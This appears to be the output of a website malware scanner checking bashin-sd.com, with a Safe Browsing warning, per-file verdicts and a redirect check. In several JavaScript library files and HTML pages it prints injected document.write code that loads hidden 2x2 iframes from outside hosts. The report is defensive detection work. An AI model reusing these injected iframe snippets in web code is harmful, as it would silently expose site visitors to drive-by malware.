Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bashin-sd.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bashin-sd.com/ | 200 OK Content-Length: 8962 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?i=1235361> | ||
http://bashin-sd.com/js/swfobject.js | 200 OK Content-Length: 7370 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361></iframe>'); if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://drannettesilber.com/wzoi.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361> | ||
http://bashin-sd.com/Scripts/swfobject_modified.js | 200 OK Content-Length: 22185 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361></iframe>'); var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", if (ua.ie && ua.win) { storedAltContent.style.display = "block"; } } storedAltContent = null; storedAltContentId = null; isExpressInstallActive = false; } } } }; }(); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://drannettesilber.com/wzoi.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361> Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361> | ||
http://bashin-sd.com/contacts.html | 200 OK Content-Length: 6460 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?i=1235361> | ||
http://bashin-sd.com/./js/inclu.js | 200 OK Content-Length: 4842 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361></iframe>'); var sth=/\w+\s*/; var word=/\w+/; var passreg=/^[\w_\d@\.\$-]+$/; var emlreg=/^\w+([-+.']\w+)*@\w+([-.]\w+)*\.\w+([-.]\w ctl1=getCtl(tempctl); if(!ctl1) continue; if(i%2==0) { ctl1.className="tdf"; } else { ctl1.className="tds"; } } ct="tr"+ind; ct1= getCtl(ct); ct1.className="tdsel"; } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http: Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://drannettesilber.com/wzoi.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361> Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361> | ||
http://bashin-sd.com/./js/contact.js | 200 OK Content-Length: 1007 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361></iframe>'); function checkContact() { ctl = getCtl('name'); if(ctl.value.search(sth)==-1) { alert("Enter Name");< } ctl = getCtl('email'); if(ctl.value.search(sth)==-1) { alert("Enter Email"); ctl.focus(); return false; } if(ctl.value.search(emlreg)==-1) { alert("Enter A Valid Email"); ctl.focus(); return false; } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://drannettesilber.com/wzoi.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361> | ||
http://bashin-sd.com/services.html | 200 OK Content-Length: 4937 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?i=1235361> | ||
http://bashin-sd.com/gallery.html | 200 OK Content-Length: 10866 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?i=1235361> | ||
http://bashin-sd.com/js/prototype.js | 200 OK Content-Length: 48083 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361></iframe>'); var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)', empt valueL += element.offsetLeft || 0; if (element.offsetParent == document.body) if (Element.getStyle(element, 'position') == 'absolute') break; element = element.offsetParent; } while (element); return [valueL, valueT]; } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://drannettesilber.com/wzoi.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361> Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361> | ||
http://bashin-sd.com/js/scriptaculous.js?load=effects | 200 OK Content-Length: 2642 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361></iframe>'); var Scriptaculous = { Version: '1.5.1', require: function(libraryName) { document.write('<script type="te var includes = s.src.match(/\?.*load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } } Scriptaculous.load(); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://drannettesilber.com/wzoi.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361> Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361> | ||
http://bashin-sd.com/js/lightbox.js | 200 OK Content-Length: 23871 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361></iframe>'); var fileLoadingImage = "images/loading.gif"; var fileBottomNavCloseImage = "images/closelabel.gif"; var animate = true; va } } function pause(ms){ var date = new Date(); curDate = null; do{var curDate = new Date();} while( curDate - date < ms); } function initLightbox() { myLightbox = new Lightbox(); } Event.observe(window, 'load', initLightbox, false); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://drannettesilber.com/wzoi.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361> Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361> | ||
http://bashin-sd.com/about-us.html | 200 OK Content-Length: 5222 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?i=1235361> | ||
http://bashin-sd.com/index.html | 200 OK Content-Length: 8962 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?i=1235361> | ||
http://bashin-sd.com/test404page.js | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
http://bashin-sd.com/images/gallery/pic1-big.jpg | 200 OK Content-Length: 300469 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bashin-sd.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 04 Sep 2014 19:38:20 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Content-Length: 8962
Content-Type: text/html
Last-Modified: Sat, 09 Mar 2013 06:01:25 GMT
...8962 bytes of data.
GET / HTTP/1.1
Host: bashin-sd.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 04 Sep 2014 19:38:20 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Content-Length: 8962
Content-Type: text/html
Last-Modified: Sat, 09 Mar 2013 06:01:25 GMT
...8962 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bashin-sd.com
Referer: http://www.google.com/search?q=bashin-sd.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bashin-sd.com
Referer: http://www.google.com/search?q=bashin-sd.com
Result:
The result is similar to the first query. There are no suspicious redirects found.